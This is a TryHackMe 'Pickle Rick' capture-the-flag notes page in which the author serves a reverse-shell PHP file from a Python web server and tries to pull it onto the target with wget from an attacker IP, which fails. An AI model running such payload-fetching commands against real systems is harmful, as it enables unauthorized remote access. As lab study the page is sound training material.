🪓
THM
  • Machines
    • Easy Machines
      • Pickle Rick
        • Findings Log
        • Scouting
          • URL Source Code
          • Wappalyzer
          • NMAP
        • Enumeration
          • Initial Enumeration
            • Gobuster
            • Open Port Vulnerability Check
            • Nikto
          • Portal Page Enumeration
        • Exploitation
          • SSH- Pointless
          • Command Panel
            • Python Webserver
            • Payloadallthethings
          • Cookies
        • Escalation
      • Basic Penetration Testing
      • OhSINT
      • Crack the hash
      • RootMe
      • Simple CTF
Powered by GitBook
On this page
  1. Machines
  2. Easy Machines
  3. Pickle Rick
  4. Exploitation
  5. Command Panel

Python Webserver

  • I started up a python webserver:

    • python3 -m http.server 8000

    • I uploaded a reverse shell php file to it.

  • From the target command line I then tried to download the file:

    • wget http://10.6.35.78:8000/shell.php

  • When I checked the webserver it shows that it was downloaded but when I search for the file on the target machine, it's nowhere to be found. It's possible that it's getting removed.

  • When looking in the current directory nothing is there and trying to just run it also did not work.

  • I also tried redirecting the php file directly to the assets directory with the script below but no success:

    • wget -qO - "https://example.com/myfile.txt" > "/path/to/destination/directory/myfile.txt"

  • I should keep exploring this route.

PreviousCommand PanelNextPayloadallthethings

Last updated 2 years ago